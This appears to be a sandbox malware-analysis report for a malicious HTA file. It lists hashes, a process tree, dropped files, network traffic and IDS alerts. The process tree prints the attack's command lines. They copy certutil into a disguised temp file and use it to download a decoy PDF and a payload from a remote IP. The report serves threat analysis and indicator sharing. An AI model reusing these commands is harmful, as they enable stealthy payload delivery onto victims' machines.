download: | indo.hta |
Full analysis: | https://app.any.run/tasks/c8aeb3f9-1d34-475c-8509-68844ea1472d |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 14:49:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 8F5D828C34CB6B9064F42D29A40E6554 |
SHA1: | 373030101CB384BA03537272625BE489193B232D |
SHA256: | 838E0B3854FCDA53EBD689C9B9F004A20DEAF5B78761211A4D4C31E94ED583FF |
SSDEEP: | 96:qW6b7p6xD2qXv+eRuJ2jXtvji/MxUGdmAxrzB1ke7cMTWZBzzIL8nJ2:qn7YxNv+eRuU7tcMZdBrzBye7cZEYnM |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\indo.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
128 | "C:\Windows\System32\cmd.exe" /c echo cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" >C:\Users\admin\AppData\Local\Temp\cp13.bat | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2744 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\cp13.bat | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3660 | cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" | C:\Windows\system32\cmd.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2396 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" C:\Users\admin\AppData\Local\Temp\"id-tax-info-2017-january-en.pdf" | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2868 | C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" C:\Users\admin\AppData\Local\Temp\"id-tax-info-2017-january-en.pdf" | C:\Users\admin\AppData\Local\Temp\windows.cpl | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3368 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" delete | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3836 | C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/id-tax-info-2017-january-en.pdf" delete | C:\Users\admin\AppData\Local\Temp\windows.cpl | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3248 | "C:\Windows\System32\cmd.exe" /c start C:\Users\admin\AppData\Local\Temp\"id-tax-info-2017-january-en.pdf" | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3412 | "C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://66.42.116.123:80/download/indo.dat" C:\Users\admin\AppData\Local\Temp\windat.dat | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OGX14S2CVW6APHH7F3XZ.temp | — | |
MD5:— | SHA256:— | |||
3692 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal | — | |
MD5:— | SHA256:— | |||
2868 | windows.cpl | C:\Users\admin\AppData\Local\Temp\id-tax-info-2017-january-en.pdf | ||
MD5:D49A3D9709244829EC21A5DAE87FE6A0 | SHA256:F315C056A1BCC7634418470D74953E1F0B8E8C9CC0FB775B877451B47423578B | |||
3692 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages | sqlite | |
MD5:0B8BDBB076B08E5036ED7E9D59564860 | SHA256:60E1FE70C2C455F22D9BE3E19CAB4FF36C4D12D92B5058EE5CE71A8C8373E3EB | |||
2240 | windows.cpl | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2708BF105D2523DEAE180BEECA6BC20D | binary | |
MD5:2FD86666C4641D3EFAC708153822BA21 | SHA256:65130CD9DB4980C2C379F649AEEC92CB6E3DECC38313F6326DCE42A38384CCE9 | |||
3928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a658.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2240 | windows.cpl | C:\Users\admin\AppData\Local\Temp\windat.dat | text | |
MD5:D5F8E94411FCCD62CD4A0B162B5A30A3 | SHA256:E146A9CD989B2E5EA6FD57CD2B65499BFB09ECA97BEA2CFE9A4AE2CD55D6948E | |||
2868 | windows.cpl | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\id-tax-info-2017-january-en[1].pdf | ||
MD5:D49A3D9709244829EC21A5DAE87FE6A0 | SHA256:F315C056A1BCC7634418470D74953E1F0B8E8C9CC0FB775B877451B47423578B | |||
3952 | windows.cpl | C:\Users\admin\AppData\Local\Temp\windat.ps1 | text | |
MD5:546D9112C16E89EF10CE200B1AF2010B | SHA256:0873AF729FA0E21F7CC5B4D746C4D4715A6CBC37F4CC301A87FF52F33A16ECC4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2868 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/id-tax-info-2017-january-en.pdf | US | pdf | 326 Kb | suspicious |
2240 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/indo.dat | US | text | 117 Kb | suspicious |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip | DE | — | — | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/278_15_23_20070.zip | DE | — | — | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip | DE | — | — | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip | DE | — | — | whitelisted |
3696 | mscorsw.exe | GET | 200 | 13.107.4.50:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 55.2 Kb | whitelisted |
4024 | AcroRd32.exe | GET | 304 | 92.122.195.163:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip | DE | — | — | whitelisted |
2868 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/id-tax-info-2017-january-en.pdf | US | pdf | 326 Kb | suspicious |
2240 | windows.cpl | GET | 200 | 66.42.116.123:80 | http://66.42.116.123/download/indo.dat | US | text | 117 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3696 | mscorsw.exe | 66.42.116.123:443 | — | — | US | suspicious |
2868 | windows.cpl | 66.42.116.123:80 | — | — | US | suspicious |
4024 | AcroRd32.exe | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
2240 | windows.cpl | 66.42.116.123:80 | — | — | US | suspicious |
— | — | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
3696 | mscorsw.exe | 13.107.4.50:80 | www.download.windowsupdate.com | Microsoft Corporation | US | whitelisted |
4024 | AcroRd32.exe | 92.122.195.163:80 | acroipm2.adobe.com | Akamai International B.V. | DE | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.download.windowsupdate.com |
| whitelisted |
acroipm2.adobe.com |
| whitelisted |
armmf.adobe.com |
| whitelisted |
ardownload2.adobe.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2868 | windows.cpl | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
2240 | windows.cpl | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |